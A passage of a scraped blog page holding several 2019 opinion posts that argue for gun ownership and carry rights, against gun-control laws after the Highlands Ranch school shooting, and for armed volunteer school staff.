a:link, #content .post-header h2 a:visited { color: #444; } #content .meta a:link, #content .meta a:visited { color: #666; } </style> <script type="text/javascript"> function __ATA_CC() {var v = document.cookie.match('(^|;) ?personalized-ads-consent=([^;]*)(;|$)');return v ? 1 : 0;} var __ATA_PP = { pt: 0, ht: 0, tn: 'vigilance', amp: false, siteid: 8982, blogid: 23064700, consent: __ATA_CC(), flag: 2 }; </script> <script type="text/javascript"> !function(){var e=document.createElement("script");e.async=!0,e.type="text/javascript";var t=window.__ATA_PP||{},n=["r="+(new Date).getTime()];for(var r in t)t.hasOwnProperty(r)&&("amp"===r&&(t[r]=Number(t[r])),n.push(r+"="+encodeURIComponent(t[r])));e.src="//s.pubmine.com/mhead.js?"+n.join("&");var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(); </script><meta name="application-name" content="SlowFacts" /><meta name="msapplication-window" content="width=device-width;height=device-height" /><meta name="msapplication-tooltip" content="Fast opinions come and go. Here are the slow facts." /><meta name="msapplication-task" content="name=Subscribe;action-uri=https://slowfacts.wordpress.com/feed/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="description" content="Fast opinions come and go. Here are the slow facts." /> <style type="text/css"> #title { background: url(https://slowfacts.files.wordpress.com/2011/10/robbloghead1.jpg) no-repeat; height: 180px; } #title { text-indent: -999em !important; } #title a { height: 180px; } </style> <style type="text/css" id="syntaxhighlighteranchor"></style> </head> <body class="home blog mp6 customizer-styles-applied vigilance-light highlander-enabled highlander-light infinite-scroll neverending"> <div class="skip-content"><a href="#content">Skip to content</a></div> <div id="wrapper"> <div id="header" class="clear"> <h1 id="title"><a href="https://slowfacts.wordpress.com"><span>SlowFacts</span></a></h1> <div id="description"> <h2>Fast opinions come and go. Here are the slow facts.</h2> </div><!--end description--> <div id="nav"> <ul class="menu"> <li class="page_item current_page_item"><a href="https://slowfacts.wordpress.com">Home</a></li> <li class="page_item page-item-5052"><a href="https://slowfacts.wordpress.com/comments/">About Comments</a></li> <li class="page_item page-item-625"><a href="https://slowfacts.wordpress.com/about-slowfacts/">About SlowFacts</a></li> <li class="page_item page-item-14051"><a href="https://slowfacts.wordpress.com/archive/">Archive</a></li> <li class="page_item page-item-3919"><a href="https://slowfacts.wordpress.com/contact-me/">Contact Me</a></li> <li class="page_item page-item-1692"><a href="https://slowfacts.wordpress.com/fair-use/">Fair Use</a></li> </ul> </div><!--end nav--> </div><!--end header--> <div id="content" class="pad"> <div id="post-15514" class="post-15514 post type-post status-publish format-standard has-post-thumbnail hentry category-gun-culture category-self-defense tag-gun-culture tag-self-defense"> <div class="post-header"> <h2><a href="https://slowfacts.wordpress.com/2019/05/14/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it/" rel="bookmark">Guns Ownership is a Dangerous Virtue.. and we need to defend&nbsp;it</a></h2> <div class="date">May 14, 2019</div> </div><!--end post header--> <div class="meta clear"> <div class="tags">tags: <a href="https://slowfacts.wordpress.com/tag/gun-culture/" rel="tag">gun culture</a>, <a href="https://slowfacts.wordpress.com/tag/self-defense/" rel="tag">self defense</a></div> <div class="author"> </div> </div><!--end meta--> <div class="entry clear"> <img width="250" height="72" src="https://slowfacts.files.wordpress.com/2019/05/concealed-back-to-back.jpg?w=250" class="alignleft wp-post-image" alt="" srcset="https://slowfacts.files.wordpress.com/2019/05/concealed-back-to-back.jpg?w=250 250w, https://slowfacts.files.wordpress.com/2019/05/concealed-back-to-back.jpg?w=500 500w, https://slowfacts.files.wordpress.com/2019/05/concealed-back-to-back.jpg?w=150 150w, https://slowfacts.files.wordpress.com/2019/05/concealed-back-to-back.jpg?w=400 400w" sizes="(max-width: 250px) 100vw, 250px" data-attachment-id="15520" data-permalink="https://slowfacts.wordpress.com/2019/05/14/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it/concealed-back-to-back/" data-orig-file="https://slowfacts.files.wordpress.com/2019/05/concealed-back-to-back.jpg" data-orig-size="939,271" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;Rob&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1557821871&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="concealed back to back" data-image-description="" data-medium-file="https://slowfacts.files.wordpress.com/2019/05/concealed-back-to-back.jpg?w=400" data-large-file="https://slowfacts.files.wordpress.com/2019/05/concealed-back-to-back.jpg?w=600" /> <p>Free speech is dangerous. The right to petition our government and to own guns is dangerous. Those rights are particularly threatening to entrenched politicians and the special interest they represent. Besides being dangerous, those rights are also the safest way to organize a society. It is time we defended them, not because they are safe, but because they are virtues.</p> <p>Virtues are how we do good things. Defending your community, the right to bear arms in public, is how you ensure public safety when the police aren&#8217;t there. The police are rarely there when you&#8217;re attacked by a criminal. We&#8217;ve lost much of our right to bear arms. We surrendered it to &#8220;public safety&#8221;. The right to bear arms was never meant to be convenient for politicians.</p> <p>Your gun might be &#8220;safer&#8221; if it was under lock and key. It is also less useful that way. You can&#8217;t use your gun to protect yourself and your family if it takes you minutes to put to use. We forget that. We forget that in your hands, guns save lives. Making firearms &#8220;safer&#8221; and less accessible means we save fewer lives.</p> <p>I see that every day. I study self-defense week after week, year after year. I also study the statistics of armed defense. I report the stories where ordinary people like you stopped a violent assault. You saved your life. You also saved the lives of your family and other innocent parties. I see it. Unfortunately, you can&#8217;t protect the people you love once you&#8217;ve made your tools of self-defense &#8220;safe&#8221;.</p> <p>Like the police, you will probably never need to press the trigger. Unlike the police who see violence every day, your family will probably see violence once in your lifetime. That is what the FBI statistics tell us. There are about 70 million families in the USA, so the numbers add up. We defend ourselves about once every 30 seconds.</p> <p>You protect yourself when you go buy groceries and when you fill up your car with gas. You protect yourself at work and at home. You protect yourself on your way to the gym, to school and to church. When the attack is over and you&#8217;ve defended yourself and others, then you call the police. That is what good people do. The police show up minutes later and take a report. The fact that you go armed, that you have your self-defense tools with you, that makes all of us safer. Thank you.</p> <p>About 20 million of us have permits to carry a concealed weapon in public. That is about one-in-ten adults. The number of us carrying in public increases to about one-in-five adults when the government gets out of the way. Government fees and licensing requirements disarmed about half of us. That is bad. Disarming the good guys makes us less safe.</p> <p>Gun-control disarms us by inches. As we&#8217;ve seen in the news, there is no such thing as a &#8220;gun-free&#8221; zone. Politicians said that honest people should be disarmed so that only criminals would be the only ones with guns. Politicians don&#8217;t want your gun to be too big or too small, too old or too new.. except for their bodyguards, of course. Politicians want you disarmed. For many reasons, disarming you is safer for them.</p> <p>Being disarmed is not safer for you and me. Good women with guns and good men with guns make their families safer and their communities safer. You can&#8217;t be a force for good if you don&#8217;t have your self-defense tools, and the training to use them.</p> <p>I have to address a comforting myth about owning a gun. The average defense takes place in seconds. That isn&#8217;t enough time for you run to your gun safe, get your ammunition that you stored separately, load a magazine, and protect your family or your employees. Time yourself.* You&#8217;ll see that I&#8217;m right. A gun you can&#8217;t use is dangerous.</p> <p>We defend ourselves a million times a year with a firearm. We also have thousands of firearms accidents each year. Criminals put their guns under the front steps. Thugs leave their guns under the couch cushions in their girlfriends house. That is where children find them and where children get hurt. I want you to own your firearms responsibly, but I also want you to keep them accessible so you can use your &#8220;rescue tools&#8221; when you need them. For many of us, that means you carry your gun on your body and then put it in a small, quick-access, gun vault. That is careful storage of a dangerous tool. That is what good men and good women do. I thank you.</p> <p>I mean you, the average citizen of the USA. I want you to exercise your rights. I want you to have dangerous freedom because I trust you. You have more common sense and honesty than the politicians paraded before us on the news. I trust your wisdom and your motives far more than I trust theirs.<br /> ~_~_</p> <p>*- I asked my listeners to get their guns from &#8220;safe storage&#8221;. It takes them over half a minute to access a &#8220;safe&#8221; gun.</p> <p>I gave you 800 words. Please share them with a friend. RM</p> <p>&nbsp;</p> <p>&nbsp;</p> <div id="jp-post-flair" class="sharedaddy sd-rating-enabled sd-like-enabled sd-sharing-enabled"><div class="sd-block sd-rating"><h3 class="sd-title">Rate this:</h3><div class="cs-rating pd-rating" id="pd_rating_holder_4489229_post_15514" data-settings="{&quot;id&quot;:4489229,&quot;item_id&quot;:&quot;_post_15514&quot;,&quot;settings&quot;:&quot;{\&quot;id\&quot;:4489229,\&quot;unique_id\&quot;:\&quot;wp-post-15514\&quot;,\&quot;title\&quot;:\&quot;Guns%20Ownership%20is%20a%20Dangerous%20Virtue..%20and%20we%20need%20to%20defend%26nbsp%3Bit\&quot;,\&quot;permalink\&quot;:\&quot;https:\\\/\\\/slowfacts.wordpress.com\\\/2019\\\/05\\\/14\\\/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it\\\/\&quot;,\&quot;item_id\&quot;:\&quot;_post_15514\&quot;}&quot;}"></div></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-official sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://slowfacts.wordpress.com/2019/05/14/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it/" data-text="Guns Ownership is a Dangerous Virtue.. and we need to defend it" data-via="wordpressdotcom" data-related="wordpressdotcom">Tweet</a></li><li class="share-facebook"><div class="fb-share-button" data-href="https://slowfacts.wordpress.com/2019/05/14/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it/" data-layout="button_count"></div></li><li class="share-reddit"><div class="reddit_button"><iframe src="https://www.reddit.com/static/button/button1.html?newwindow=true&width=120&amp;url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F14%2Fguns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it%2F&amp;title=Guns%20Ownership%20is%20a%20Dangerous%20Virtue..%20and%20we%20need%20to%20defend%20it" height="22" width="120" scrolling="no" frameborder="0"></iframe></div></li><li class="share-tumblr"><a class="tumblr-share-button" target="_blank" href="https://www.tumblr.com/share" data-title="Guns Ownership is a Dangerous Virtue.. and we need to defend it" data-content="https://slowfacts.wordpress.com/2019/05/14/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it/" title="Share on Tumblr"data-posttype="link">Share on Tumblr</a></li><li class="share-pinterest"><div class="pinterest_button"><a href="https://www.pinterest.com/pin/create/button/?url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F14%2Fguns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it%2F&#038;media=https%3A%2F%2Fslowfacts.files.wordpress.com%2F2019%2F05%2Fconcealed-back-to-back.jpg&#038;description=Guns%20Ownership%20is%20a%20Dangerous%20Virtue..%20and%20we%20need%20to%20defend%20it" data-pin-do="buttonPin" data-pin-config="beside"><img src="//assets.pinterest.com/images/pidgets/pinit_fg_en_rect_gray_20.png" /></a></div></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button" href="https://slowfacts.wordpress.com/2019/05/14/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it/?share=email" target="_blank" title="Click to email this to a friend"><span>Email</span></a></li><li class="share-linkedin"><div class="linkedin_button"><script type="in/share" data-url="https://slowfacts.wordpress.com/2019/05/14/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it/" data-counter="right"></script></div></li><li class="share-pocket"><div class="pocket_button"><a href="https://getpocket.com/save" class="pocket-btn" data-lang="en" data-save-url="https://slowfacts.wordpress.com/2019/05/14/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it/" data-pocket-count="horizontal" >Pocket</a></div></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-23064700-15514-5cdd8cd9eaec2' data-src='//widgets.wp.com/likes/index.html?ver=20190321#blog_id=23064700&amp;post_id=15514&amp;origin=slowfacts.wordpress.com&amp;obj_id=23064700-15514-5cdd8cd9eaec2' data-name='like-post-frame-23064700-15514-5cdd8cd9eaec2'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div></div> </div><!--end entry--> <div class="post-footer"> <div class="comments"><a href="https://slowfacts.wordpress.com/2019/05/14/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it/#comments">5 Comments</a></div> <div class="categories">from &rarr; <a href="https://slowfacts.wordpress.com/category/gun-culture/" rel="category tag">gun culture</a>, <a href="https://slowfacts.wordpress.com/category/self-defense/" rel="category tag">self defense</a></div> </div><!--end post footer--> </div><!--end post--> <div id="post-15498" class="post-15498 post type-post status-publish format-standard hentry category-faster category-gun-control tag-faster tag-gun-control"> <div class="post-header"> <h2><a href="https://slowfacts.wordpress.com/2019/05/13/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law/" rel="bookmark">Gun Control Failed Again in Denver- mass murderers don&#8217;t obey the&nbsp;law</a></h2> <div class="date">May 13, 2019</div> </div><!--end post header--> <div class="meta clear"> <div class="tags">tags: <a href="https://slowfacts.wordpress.com/tag/faster/" rel="tag">FASTER</a>, <a href="https://slowfacts.wordpress.com/tag/gun-control/" rel="tag">gun control</a></div> <div class="author"> </div> </div><!--end meta--> <div class="entry clear"> <p>I shouldn&#8217;t have to remind the media of the obvious, but mass murderers break the law. The 17 and 18 year old murderers broke many laws, both before and during their attack at the STEM School in Highlands Ranch, Colorado. This is important because it means that passing more restrictive laws won&#8217;t stop the next mass murderers since they too are willing to break the law. We have to wonder why we have these gun laws when they fail all the time. I hope that is glaringly obvious, but let me explain it to those who have doubts.</p> <p>The two attackers smashed their way into a locked gun cabinet to steal the guns they used. Yes, safe storage laws failed to stop mass murder. This is the rule rather than the exception, since virtually all criminals get their guns illegally. Why do we have safe-storage requirements if they don&#8217;t stop criminals and mass murderers?</p> <p>It is illegal for a 17 year old be in possession of a handgun. There are exceptions if the teens are accompanied by the gun owners and taking part in prescribed activities. I checked the law in Colorado, and mass murder is not one of the approved exceptions. That means that putting more age restrictions on law abiding gun owners won&#8217;t stop mass murderers. That shouldn&#8217;t come as a surprise since those laws didn&#8217;t stop other criminal either.</p> <p>The murderers took their illegally possessed handguns guns into the 1000 foot gun-free-school-zone that is around school property. They murderers took their guns onto school grounds when they drove into the parking lot. They also took their guns into school buildings. Each of those acts was illegal for them to do. Gun control laws didn&#8217;t stop mass murderers any better than the laws stop ordinary criminals from breaking the law.</p> <p>The murderers hid their guns as they entered the campus. That is illegal without a concealed carry license. Criminals and mass murderers are not willing to sit through classes and pay fees to get a carry permit. Our gun laws stop law-abiding people from carrying guns, but law-abiding people were never the problem in the first place.</p> <p>The two attackers committed several counts of aggravated assault and battery. They committed murder and several counts of attempted murder. You don&#8217;t care about breaking lessor laws when you intend to commit mass murder. Who thought that murderers would obey our gun laws?<a href="https://slowfacts.files.wordpress.com/2019/05/gun-laws-fail.jpg"><img data-attachment-id="15510" data-permalink="https://slowfacts.wordpress.com/2019/05/13/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law/gun-laws-fail/" data-orig-file="https://slowfacts.files.wordpress.com/2019/05/gun-laws-fail.jpg" data-orig-size="960,960" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="gun laws fail" data-image-description="" data-medium-file="https://slowfacts.files.wordpress.com/2019/05/gun-laws-fail.jpg?w=300" data-large-file="https://slowfacts.files.wordpress.com/2019/05/gun-laws-fail.jpg?w=600" class="alignright wp-image-15510" src="https://slowfacts.files.wordpress.com/2019/05/gun-laws-fail.jpg?w=257&#038;h=257" alt="" width="257" height="257" srcset="https://slowfacts.files.wordpress.com/2019/05/gun-laws-fail.jpg?w=257&amp;h=257 257w, https://slowfacts.files.wordpress.com/2019/05/gun-laws-fail.jpg?w=514&amp;h=514 514w, https://slowfacts.files.wordpress.com/2019/05/gun-laws-fail.jpg?w=150&amp;h=150 150w, https://slowfacts.files.wordpress.com/2019/05/gun-laws-fail.jpg?w=300&amp;h=300 300w" sizes="(max-width: 257px) 100vw, 257px" /></a></p> <p>&nbsp;</p> <p>These mass murderers stole the guns they used, so they never bothered to apply for a background check. Mandatory purchase-waiting-periods don&#8217;t stop murderers. Mandatory safety classes before a gun purchase don&#8217;t stop murderers. One-gun-a-month restrictions don&#8217;t stop murderers either because murderers don&#8217;t buy their guns from gun shops. Only law-abiding gun owners do that. Why do we think mass murderers and criminals will start obeying these laws in the future?</p> <p>We have to ask the obvious question since these gun-control laws don&#8217;t work. Were these laws designed to stop murderers, or to disarm the law abiding? We&#8217;ve seen these laws fail time after time. Given that history of failure, I can&#8217;t believe the politicians who call for more gun control today.</p> <h3 style="text-align:center;">Some people obey the law and some people break it.<br /> Which type is disarmed by gun control?</h3> <p>Licensed concealed carry holders are the most law abiding and non-violent people on the planet. Gun control politicians want them disarmed and kept out of schools. Our children are too important to be used as pawns by politicians.<br /> ~_~_~_</p> <p>Sources-<br /> <a href="https://www.washingtonexaminer.com/news/colorado-school-shooters-stole-guns-from-parents" rel="nofollow">https://www.washingtonexaminer.com/news/colorado-school-shooters-stole-guns-from-parents</a><br /> <a href="http://gunwatch.blogspot.com/2018/04/legally-armed-people-have-murder-rate.html" rel="nofollow">http://gunwatch.blogspot.com/2018/04/legally-armed-people-have-murder-rate.html</a><br /> <a href="https://www.10news.com/news/local-news/feds-suspected-poway-shooters-firearm-purchased-from-licensed-dealer-in-san-diego" rel="nofollow">https://www.10news.com/news/local-news/feds-suspected-poway-shooters-firearm-purchased-from-licensed-dealer-in-san-diego</a></p> <p>I gave you 500 words. Please leave a comment and share this article with a friend. RM</p> <div id="jp-post-flair" class="sharedaddy sd-rating-enabled sd-like-enabled sd-sharing-enabled"><div class="sd-block sd-rating"><h3 class="sd-title">Rate this:</h3><div class="cs-rating pd-rating" id="pd_rating_holder_4489229_post_15498" data-settings="{&quot;id&quot;:4489229,&quot;item_id&quot;:&quot;_post_15498&quot;,&quot;settings&quot;:&quot;{\&quot;id\&quot;:4489229,\&quot;unique_id\&quot;:\&quot;wp-post-15498\&quot;,\&quot;title\&quot;:\&quot;Gun%20Control%20Failed%20Again%20in%20Denver-%20mass%20murderers%20don%26%238217%3Bt%20obey%20the%26nbsp%3Blaw\&quot;,\&quot;permalink\&quot;:\&quot;https:\\\/\\\/slowfacts.wordpress.com\\\/2019\\\/05\\\/13\\\/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law\\\/\&quot;,\&quot;item_id\&quot;:\&quot;_post_15498\&quot;}&quot;}"></div></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-official sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://slowfacts.wordpress.com/2019/05/13/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law/" data-text="Gun Control Failed Again in Denver- mass murderers don&#039;t obey the law" data-via="wordpressdotcom" data-related="wordpressdotcom">Tweet</a></li><li class="share-facebook"><div class="fb-share-button" data-href="https://slowfacts.wordpress.com/2019/05/13/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law/" data-layout="button_count"></div></li><li class="share-reddit"><div class="reddit_button"><iframe src="https://www.reddit.com/static/button/button1.html?newwindow=true&width=120&amp;url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F13%2Fgun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law%2F&amp;title=Gun%20Control%20Failed%20Again%20in%20Denver-%20mass%20murderers%20don%27t%20obey%20the%20law" height="22" width="120" scrolling="no" frameborder="0"></iframe></div></li><li class="share-tumblr"><a class="tumblr-share-button" target="_blank" href="https://www.tumblr.com/share" data-title="Gun Control Failed Again in Denver- mass murderers don't obey the law" data-content="https://slowfacts.wordpress.com/2019/05/13/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law/" title="Share on Tumblr"data-posttype="link">Share on Tumblr</a></li><li class="share-pinterest"><div class="pinterest_button"><a href="https://www.pinterest.com/pin/create/button/?url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F13%2Fgun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law%2F&#038;media=https%3A%2F%2Fslowfacts.files.wordpress.com%2F2019%2F05%2Fgun-laws-fail.jpg&#038;description=Gun%20Control%20Failed%20Again%20in%20Denver-%20mass%20murderers%20don%27t%20obey%20the%20law" data-pin-do="buttonPin" data-pin-config="beside"><img src="//assets.pinterest.com/images/pidgets/pinit_fg_en_rect_gray_20.png" /></a></div></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button" href="https://slowfacts.wordpress.com/2019/05/13/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law/?share=email" target="_blank" title="Click to email this to a friend"><span>Email</span></a></li><li class="share-linkedin"><div class="linkedin_button"><script type="in/share" data-url="https://slowfacts.wordpress.com/2019/05/13/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law/" data-counter="right"></script></div></li><li class="share-pocket"><div class="pocket_button"><a href="https://getpocket.com/save" class="pocket-btn" data-lang="en" data-save-url="https://slowfacts.wordpress.com/2019/05/13/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law/" data-pocket-count="horizontal" >Pocket</a></div></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-23064700-15498-5cdd8cd9ee688' data-src='//widgets.wp.com/likes/index.html?ver=20190321#blog_id=23064700&amp;post_id=15498&amp;origin=slowfacts.wordpress.com&amp;obj_id=23064700-15498-5cdd8cd9ee688' data-name='like-post-frame-23064700-15498-5cdd8cd9ee688'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div></div> </div><!--end entry--> <div class="post-footer"> <div class="comments"><a href="https://slowfacts.wordpress.com/2019/05/13/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law/#comments">7 Comments</a></div> <div class="categories">from &rarr; <a href="https://slowfacts.wordpress.com/category/faster/" rel="category tag">FASTER</a>, <a href="https://slowfacts.wordpress.com/category/gun-control/" rel="category tag">gun control</a></div> </div><!--end post footer--> </div><!--end post--> <div id="post-15486" class="post-15486 post type-post status-publish format-standard hentry category-faster tag-faster"> <div class="post-header"> <h2><a href="https://slowfacts.wordpress.com/2019/05/10/how-to-skew-the-debate-and-get-more-kids-killed/" rel="bookmark">How to Skew the Debate and Get More Kids&nbsp;Killed</a></h2> <div class="date">May 10, 2019</div> </div><!--end post header--> <div class="meta clear"> <div class="tags">tags: <a href="https://slowfacts.wordpress.com/tag/faster/" rel="tag">FASTER</a></div> <div class="author"> </div> </div><!--end meta--> <div class="entry clear"> <p>How should we protect our children at school?</p> <p>Asking skewed and inappropriate questions leads to inappropriate answers as we work to protect our children. We&#8217;ve seen special interests, including government officials, do exactly that. That dishonest inquiry furthers their agenda, rather than ours. Protecting our children is too important a problem to leave to politicians.</p> <p>Most of us learned something important as we reached adolescence; <span style="text-decoration:underline;">the answer you got depended on how you asked the question.</span> That is certainly true when we read skewed questions about defending our kids.</p> <p>I&#8217;ve read headlines like these-</p> <h3 style="text-align:center;">Should we give guns to teachers?</h3> <h3 style="text-align:center;">Do more guns really belong in schools?</h3> <p style="text-align:center;">Or worse,</p> <h3 style="text-align:center;">&#8220;Do we want the new kindergarten teacher to look like this?&#8221;</h3> <div data-shortcode="caption" id="attachment_15488" style="width: 410px" class="wp-caption aligncenter"><a href="https://slowfacts.files.wordpress.com/2019/05/soldier-with-rifle.jpg"><img aria-describedby="caption-attachment-15488" data-attachment-id="15488" data-permalink="https://slowfacts.wordpress.com/2019/05/10/how-to-skew-the-debate-and-get-more-kids-killed/soldier-with-rifle/" data-orig-file="https://slowfacts.files.wordpress.com/2019/05/soldier-with-rifle.jpg" data-orig-size="1200,800" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="soldier with rifle" data-image-description="" data-medium-file="https://slowfacts.files.wordpress.com/2019/05/soldier-with-rifle.jpg?w=400" data-large-file="https://slowfacts.files.wordpress.com/2019/05/soldier-with-rifle.jpg?w=600" class="wp-image-15488 size-medium" src="https://slowfacts.files.wordpress.com/2019/05/soldier-with-rifle.jpg?w=400&#038;h=267" alt="" width="400" height="267" srcset="https://slowfacts.files.wordpress.com/2019/05/soldier-with-rifle.jpg?w=400&amp;h=267 400w, https://slowfacts.files.wordpress.com/2019/05/soldier-with-rifle.jpg?w=800&amp;h=534 800w, https://slowfacts.files.wordpress.com/2019/05/soldier-with-rifle.jpg?w=150&amp;h=100 150w, https://slowfacts.files.wordpress.com/2019/05/soldier-with-rifle.jpg?w=768&amp;h=512 768w" sizes="(max-width: 400px) 100vw, 400px" /></a><p id="caption-attachment-15488" class="wp-caption-text"><strong>Is this the new kindergarten teacher?</strong></p></div> <p>What do real solutions look like as we work to protect our children in school? Here is a more moderate perspective on protecting our kids.</p> <p><a href="https://slowfacts.files.wordpress.com/2018/03/faster-school-training-safety-students-guns-teachers.jpg"><img data-attachment-id="13846" data-permalink="https://slowfacts.wordpress.com/2018/03/12/questions-and-answers-about-arming-teachers/faster-school-training-safety-students-guns-teachers/" data-orig-file="https://slowfacts.files.wordpress.com/2018/03/faster-school-training-safety-students-guns-teachers.jpg" data-orig-size="1000,619" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;Tomwang112&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="" data-image-description="" data-medium-file="https://slowfacts.files.wordpress.com/2018/03/faster-school-training-safety-students-guns-teachers.jpg?w=400" data-large-file="https://slowfacts.files.wordpress.com/2018/03/faster-school-training-safety-students-guns-teachers.jpg?w=600" class="aligncenter wp-image-13846 size-medium" src="https://slowfacts.files.wordpress.com/2018/03/faster-school-training-safety-students-guns-teachers.jpg?w=400&#038;h=248" alt="" width="400" height="248" srcset="https://slowfacts.files.wordpress.com/2018/03/faster-school-training-safety-students-guns-teachers.jpg?w=400&amp;h=248 400w, https://slowfacts.files.wordpress.com/2018/03/faster-school-training-safety-students-guns-teachers.jpg?w=800&amp;h=496 800w, https://slowfacts.files.wordpress.com/2018/03/faster-school-training-safety-students-guns-teachers.jpg?w=150&amp;h=93 150w, https://slowfacts.files.wordpress.com/2018/03/faster-school-training-safety-students-guns-teachers.jpg?w=768&amp;h=475 768w" sizes="(max-width: 400px) 100vw, 400px" /></a></p> <p>I&#8217;ve taken the training required for armed teachers. I took the armed defense and medical training over several years. I&#8217;ve also spoken to staff members who volunteered to be first responders at their school. I met dozens of educators who came from at least a half dozen states. I saw the approved training programs used in both Ohio and Colorado. I also listened to the experts who determined what first responders need to know.</p> <p>The first point is that our children deserve protection. It is the government&#8217;s duty to return our children to us the way they received them. We already protect our politicians and their children. We also protect our children at home. Our kids deserve similar protection at school.</p> <p>The next perspective is that violent attacks on our schools are rare; school attacks are horrific, but unlikely. That means we shouldn&#8217;t go overboard and impose costly solutions to solve improbable problems. Putting little Johnny in an armored box creates more problems than it solves.</p> <p>Protecting our students isn&#8217;t a new problem. We&#8217;ve faced it and solved it for years. It has been 19 years since the attack at Columbine High School. It has been six years since the attack at Sandy Hook Elementary. We&#8217;ve qualified, trained, and tested thousands of volunteer school staff to be first responders in that time. We accumulated thousands of semesters of experience with armed first responders in our schools. The volunteer staff I met are exactly the sort of people I want to protect my children.</p> <p>You didn&#8217;t notice these armed defenders on campus because we don&#8217;t want you to see them. An armed man wearing a uniform on campus acts as a visible deterrent.. until the moment he isn&#8217;t. The uniformed school resource officer is often the first target of an attack. Alternatively, the attackers simply wait until the SRO is off campus.</p> <p>Trained volunteers have significant 